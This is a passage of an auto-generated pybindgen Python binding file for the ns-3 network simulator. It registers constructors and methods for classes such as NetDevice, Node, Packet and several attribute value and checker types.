    cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_pure_virtual=True, is_virtual=True)
    # RouteOutput(): pure-virtual route selection for outbound packets.
    cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_pure_virtual=True, is_virtual=True)
    # SetIpv4(): pure-virtual binding to the owning Ipv4 stack.
    cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv6AddressChecker (ipv6-address.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
    return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv6AddressValue (ipv6-address.h, module 'network')."""
    # Constructors: default, copy, and from an ns3::Ipv6Address value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
    # AttributeValue interface: Copy / DeserializeFromString / SerializeToString.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    # Typed accessors for the held Ipv6Address.
    cls.add_method('Get', 'ns3::Ipv6Address', [], is_const=True)
    cls.add_method('Set', 'void', [param('ns3::Ipv6Address const &', 'value')])
    return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv6PrefixChecker (ipv6-address.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
    return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv6PrefixValue (ipv6-address.h, module 'network')."""
    # Constructors: default, copy, and from an ns3::Ipv6Prefix value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
    # AttributeValue interface: Copy / DeserializeFromString / SerializeToString.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    # Typed accessors for the held Ipv6Prefix.
    cls.add_method('Get', 'ns3::Ipv6Prefix', [], is_const=True)
    cls.add_method('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')])
    return
def register_Ns3Mac48AddressChecker_methods(root_module, cls):
    """Register the wrapped API of ns3::Mac48AddressChecker (mac48-address.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')])
    return
def register_Ns3Mac48AddressValue_methods(root_module, cls):
    """Register the wrapped API of ns3::Mac48AddressValue (mac48-address.h, module 'network')."""
    # Constructors: default, copy, and from an ns3::Mac48Address value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Mac48Address const &', 'value')])
    # AttributeValue interface: Copy / DeserializeFromString / SerializeToString.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    # Typed accessors for the held Mac48Address.
    cls.add_method('Get', 'ns3::Mac48Address', [], is_const=True)
    cls.add_method('Set', 'void', [param('ns3::Mac48Address const &', 'value')])
    return
def register_Ns3NetDevice_methods(root_module, cls):
    """Register the wrapped API of ns3::NetDevice (net-device.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
    # AddLinkChangeCallback(): pure-virtual link-state notification registration.
    cls.add_method('AddLinkChangeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')], is_pure_virtual=True, is_virtual=True)
    # Pure-virtual const accessors.
    cls.add_method('GetAddress', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetBroadcast', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetIfIndex', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetMtu', 'uint16_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # GetMulticast() is overloaded for IPv4 and IPv6 group addresses.
    cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv4Address', 'multicastGroup')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv6Address', 'addr')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # GetTypeId(): static TypeId accessor.
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Pure-virtual const capability predicates.
    cls.add_method('IsBridge', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('IsBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('IsLinkUp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('IsMulticast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('IsPointToPoint', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('NeedsArp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # Pure-virtual transmission entry points.
    cls.add_method('Send', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SendFrom', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True)
    # Pure-virtual mutators.
    cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_virtual=True)
    # Pure-virtual receive-callback registration (promiscuous and normal).
    cls.add_method('SetPromiscReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SetReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SupportsSendFrom', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3NixVector_methods(root_module, cls):
    """Register the wrapped API of ns3::NixVector (nix-vector.h, module 'network')."""
    # operator<< support for printing.
    cls.add_output_stream_operator()
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::NixVector const &', 'o')])
    # Bit-level neighbor-index operations.
    cls.add_method('AddNeighborIndex', 'void', [param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
    cls.add_method('BitCount', 'uint32_t', [param('uint32_t', 'numberOfNeighbors')], is_const=True)
    cls.add_method('ExtractNeighborIndex', 'uint32_t', [param('uint32_t', 'numberOfBits')])
    cls.add_method('GetRemainingBits', 'uint32_t', [])
    # Deep copy.
    cls.add_method('Copy', 'ns3::Ptr< ns3::NixVector >', [], is_const=True)
    # Serialization support.
    cls.add_method('Deserialize', 'uint32_t', [param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    cls.add_method('Serialize', 'uint32_t', [param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True)
    return
def register_Ns3Node_methods(root_module, cls):
    """Register the wrapped API of ns3::Node (node.h, module 'network')."""
    # Constructors: copy, default, and explicit system id.
    cls.add_constructor([param('ns3::Node const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('uint32_t', 'systemId')])
    # Aggregation of applications and devices.
    cls.add_method('AddApplication', 'uint32_t', [param('ns3::Ptr< ns3::Application >', 'application')])
    cls.add_method('AddDevice', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')])
    # ChecksumEnabled(): static global checksum switch.
    cls.add_method('ChecksumEnabled', 'bool', [], is_static=True)
    # Const accessors.
    cls.add_method('GetApplication', 'ns3::Ptr< ns3::Application >', [param('uint32_t', 'index')], is_const=True)
    cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'index')], is_const=True)
    cls.add_method('GetId', 'uint32_t', [], is_const=True)
    cls.add_method('GetNApplications', 'uint32_t', [], is_const=True)
    cls.add_method('GetNDevices', 'uint32_t', [], is_const=True)
    cls.add_method('GetSystemId', 'uint32_t', [], is_const=True)
    # GetTypeId(): static TypeId accessor.
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Device-addition listener registration.
    cls.add_method('RegisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
    cls.add_method('UnregisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
    # Protocol handler registration; 'promiscuous' defaults to false.
    cls.add_method('RegisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
    cls.add_method('UnregisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
    # Protected virtual lifecycle hooks.
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    cls.add_method('DoStart', 'void', [], visibility='protected', is_virtual=True)
    return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
    """Register Python bindings for ns3::ObjectFactoryChecker (pybindgen-generated)."""
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
    cls.add_constructor([])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
    return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
    """Register Python bindings for ns3::ObjectFactoryValue, the AttributeValue
    wrapper around ns3::ObjectFactory (pybindgen-generated)."""
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
    cls.add_constructor([])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
    cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
    ## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::ObjectFactory',
                   [],
                   is_const=True)
    ## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::ObjectFactory const &', 'value')])
    return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
    """Register Python bindings for ns3::OutputStreamWrapper (pybindgen-generated)."""
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
    cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
    cls.add_constructor([param('std::ostream *', 'os')])
    ## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
    cls.add_method('GetStream',
                   'std::ostream *',
                   [])
    return
def register_Ns3Packet_methods(root_module, cls):
    """Register Python bindings for ns3::Packet: constructors, header/trailer
    manipulation, byte/packet tags, and (de)serialization helpers
    (pybindgen-generated; the per-method ## comments are the original C++
    declarations this binding mirrors)."""
    cls.add_output_stream_operator()
    ## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
    cls.add_constructor([])
    ## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
    cls.add_constructor([param('ns3::Packet const &', 'o')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
    cls.add_constructor([param('uint32_t', 'size')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
    cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
    cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
    cls.add_method('AddAtEnd',
                   'void',
                   [param('ns3::Ptr< ns3::Packet const >', 'packet')])
    ## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
    cls.add_method('AddByteTag',
                   'void',
                   [param('ns3::Tag const &', 'tag')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
    cls.add_method('AddHeader',
                   'void',
                   [param('ns3::Header const &', 'header')])
    ## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
    cls.add_method('AddPacketTag',
                   'void',
                   [param('ns3::Tag const &', 'tag')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
    cls.add_method('AddPaddingAtEnd',
                   'void',
                   [param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
    cls.add_method('AddTrailer',
                   'void',
                   [param('ns3::Trailer const &', 'trailer')])
    ## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
    cls.add_method('BeginItem',
                   'ns3::PacketMetadata::ItemIterator',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::Packet >',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
    cls.add_method('CopyData',
                   'uint32_t',
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
    cls.add_method('CopyData',
                   'void',
                   [param('std::ostream *', 'os'), param('uint32_t', 'size')],
                   is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
    cls.add_method('CreateFragment',
                   'ns3::Ptr< ns3::Packet >',
                   [param('uint32_t', 'start'), param('uint32_t', 'length')],
                   is_const=True)
    ## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
    cls.add_method('EnableChecking',
                   'void',
                   [],
                   is_static=True)
    ## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
    cls.add_method('EnablePrinting',
                   'void',
                   [],
                   is_static=True)
    ## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
    cls.add_method('FindFirstMatchingByteTag',
                   'bool',
                   [param('ns3::Tag &', 'tag')],
                   is_const=True)
    ## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
    cls.add_method('GetByteTagIterator',
                   'ns3::ByteTagIterator',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
    cls.add_method('GetNixVector',
                   'ns3::Ptr< ns3::NixVector >',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
    cls.add_method('GetPacketTagIterator',
                   'ns3::PacketTagIterator',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
    cls.add_method('GetSize',
                   'uint32_t',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
    cls.add_method('GetUid',
                   'uint64_t',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
    cls.add_method('PeekData',
                   'uint8_t const *',
                   [],
                   deprecated=True, is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
    cls.add_method('PeekHeader',
                   'uint32_t',
                   [param('ns3::Header &', 'header')],
                   is_const=True)
    ## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
    cls.add_method('PeekPacketTag',
                   'bool',
                   [param('ns3::Tag &', 'tag')],
                   is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
    cls.add_method('PeekTrailer',
                   'uint32_t',
                   [param('ns3::Trailer &', 'trailer')])
    ## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
    cls.add_method('PrintByteTags',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
    cls.add_method('PrintPacketTags',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
    cls.add_method('RemoveAllByteTags',
                   'void',
                   [])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
    cls.add_method('RemoveAllPacketTags',
                   'void',
                   [])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
    cls.add_method('RemoveAtEnd',
                   'void',
                   [param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
    cls.add_method('RemoveAtStart',
                   'void',
                   [param('uint32_t', 'size')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
    cls.add_method('RemoveHeader',
                   'uint32_t',
                   [param('ns3::Header &', 'header')])
    ## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
    cls.add_method('RemovePacketTag',
                   'bool',
                   [param('ns3::Tag &', 'tag')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
    cls.add_method('RemoveTrailer',
                   'uint32_t',
                   [param('ns3::Trailer &', 'trailer')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
    cls.add_method('Serialize',
                   'uint32_t',
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
    cls.add_method('SetNixVector',
                   'void',
                   [param('ns3::Ptr< ns3::NixVector >', 'arg0')])
    return
def register_Ns3TimeChecker_methods(root_module, cls):
    """Register Python bindings for ns3::TimeChecker (pybindgen-generated)."""
    ## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
    cls.add_constructor([])
    ## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
    return
def register_Ns3TimeValue_methods(root_module, cls):
    """Register Python bindings for ns3::TimeValue, the AttributeValue wrapper
    around ns3::Time (pybindgen-generated)."""
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
    cls.add_constructor([])
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
    cls.add_constructor([param('ns3::Time const &', 'value')])
    ## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::Time',
                   [],
                   is_const=True)
    ## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::Time const &', 'value')])
    return
def register_Ns3TypeIdChecker_methods(root_module, cls):
    """Register Python bindings for ns3::TypeIdChecker (pybindgen-generated)."""
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
    return
def register_Ns3TypeIdValue_methods(root_module, cls):
    """Register Python bindings for ns3::TypeIdValue, the AttributeValue wrapper
    around ns3::TypeId (pybindgen-generated)."""
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
    cls.add_constructor([param('ns3::TypeId const &', 'value')])
    ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::TypeId',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::TypeId const &', 'value')])
    return
def register_Ns3AddressChecker_methods(root_module, cls):
    """Register Python bindings for ns3::AddressChecker (pybindgen-generated)."""
    ## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
    cls.add_constructor([])
    ## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
    return
def register_Ns3AddressValue_methods(root_module, cls):
    """Register Python bindings for ns3::AddressValue, the AttributeValue wrapper
    around ns3::Address (pybindgen-generated)."""
    ## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
    cls.add_constructor([])
    ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
